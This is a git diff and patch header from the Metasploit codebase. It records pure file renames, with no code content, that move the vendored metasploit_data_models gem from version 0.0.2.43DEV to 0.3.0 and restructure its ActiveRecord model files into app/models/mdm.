diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/mod_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/mod_ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/mod_ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/mod_ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_action.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_action.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_action.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_action.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_arch.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_arch.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_arch.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_arch.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_author.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_author.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_author.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_author.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_detail.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_detail.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_detail.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_mixin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_mixin.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_mixin.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_mixin.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_platform.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_platform.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_platform.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_platform.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_target.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/module_target.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/module_target.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/nexpose_console.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/nexpose_console.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/nexpose_console.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/nexpose_console.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/note.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/note.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/note.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/note.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/profile.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/profile.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/profile.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/profile.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/report.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/report.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/report.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/report.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/report_template.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/report_template.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/report_template.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/report_template.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/route.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/route.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/route.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/route.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/service.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/service.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/service.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/service.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/session.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/session.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/session.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/session.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/session_event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/session_event.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/session_event.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/session_event.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/tag.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/tag.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/tag.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/task.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/task.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/task.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/task.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/user.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/user.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/user.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_attempt.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_attempt.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_attempt.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_detail.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_detail.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_detail.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/vuln_ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/vuln_ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/web_form.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_form.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/web_form.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_form.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/web_page.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_page.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/web_page.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_page.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/web_site.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_site.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/web_site.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_site.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/web_vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_vuln.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/web_vuln.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/web_vuln.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/wmap_request.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/wmap_request.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/wmap_request.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/wmap_request.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/wmap_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/wmap_target.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/wmap_target.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/wmap_target.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/workspace.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/workspace.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/workspace.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/workspace.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/base64_serializer.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/base64_serializer.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/base64_serializer.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/base64_serializer.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/serialized_prefs.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/serialized_prefs.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/serialized_prefs.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/serialized_prefs.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/validators/ip_format_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/validators/ip_format_validator.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/validators/ip_format_validator.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/validators/ip_format_validator.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/validators/password_is_strong_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/validators/password_is_strong_validator.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/version.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/version.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/version.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/version.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/metasploit_data_models.gemspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models.gemspec
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/metasploit_data_models.gemspec
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models.gemspec
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/metasploit_data_models_live.gemspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models_live.gemspec
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/metasploit_data_models_live.gemspec
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/metasploit_data_models_live.gemspec
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/spec/lib/base64_serializer_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/lib/base64_serializer_spec.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/spec/lib/base64_serializer_spec.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/lib/base64_serializer_spec.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/spec/spec_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/spec_helper.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/spec/spec_helper.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/spec_helper.rb
diff --git a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.0.2.43DEV.gemspec b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.0.2.43DEV.gemspec
rename to lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec
From 558b8b0fcf09c407df9b615e7587372edde1cf3e Mon Sep 17 00:00:00 2001
From: Luke Imhoff Date: Thu, 1 Nov 2012 08:43:06 -0500 Subject: [PATCH 49/64] File renames and restructuring for metasploit_data_models 0.3.0 --- .../{README.mdown => README.md} | 0 .../models/mdm}/api_key.rb | 0 .../models/mdm}/client.rb | 0 .../models/mdm}/cred.rb | 0 .../models/mdm}/cred_file.rb | 0 .../models/mdm}/event.rb | 0 .../models/mdm}/exploit_attempt.rb | 0 .../models/mdm}/exploited_host.rb | 0 .../models/mdm}/host.rb | 0 .../models/mdm}/host_detail.rb | 0 .../models/mdm}/host_tag.rb | 0 .../models/mdm}/imported_cred.rb | 0 .../models/mdm}/listener.rb | 0 .../models/mdm}/loot.rb | 0 .../models/mdm}/macro.rb | 0 .../models/mdm}/mod_ref.rb | 0 .../models/mdm}/module_action.rb | 0 .../models/mdm}/module_arch.rb | 0 .../models/mdm}/module_author.rb | 0 .../models/mdm}/module_detail.rb | 0 .../models/mdm}/module_mixin.rb | 0 .../models/mdm}/module_platform.rb | 0 .../models/mdm}/module_ref.rb | 0 .../models/mdm}/module_target.rb | 0 .../models/mdm}/nexpose_console.rb | 0 .../models/mdm}/note.rb | 0 .../models/mdm}/profile.rb | 0 .../models/mdm}/ref.rb | 0 .../models/mdm}/report.rb | 0 .../models/mdm}/report_template.rb | 0 .../models/mdm}/route.rb | 0 .../models/mdm}/service.rb | 0 .../models/mdm}/session.rb | 0 .../models/mdm}/session_event.rb | 0 .../models/mdm}/tag.rb | 0 .../models/mdm}/task.rb | 0 .../models/mdm}/user.rb | 0 .../models/mdm}/vuln.rb | 0 .../models/mdm}/vuln_attempt.rb | 0 .../models/mdm}/vuln_detail.rb | 0 .../models/mdm}/vuln_ref.rb | 0 .../models/mdm}/web_form.rb | 0 .../models/mdm}/web_page.rb | 0 .../models/mdm}/web_site.rb | 0 .../models/mdm}/web_vuln.rb | 0 .../models/mdm}/wmap_request.rb | 0 .../models/mdm}/wmap_target.rb | 0 .../models/mdm}/workspace.rb | 0 .../metasploit_data_models_live.gemspec | 25 ------------------- 49 files changed, 25 deletions(-) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{README.mdown => README.md} (100%) rename 
lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/api_key.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/client.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/cred_file.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/event.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/exploit_attempt.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/exploited_host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/host_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/host_tag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/imported_cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/listener.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/loot.rb (100%) rename 
lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/macro.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/mod_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/module_action.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/module_arch.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/module_author.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/module_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/module_mixin.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/module_platform.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/module_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/module_target.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/nexpose_console.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/note.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/{lib/metasploit_data_models/active_record_models => app/models/mdm}/profile.rb 
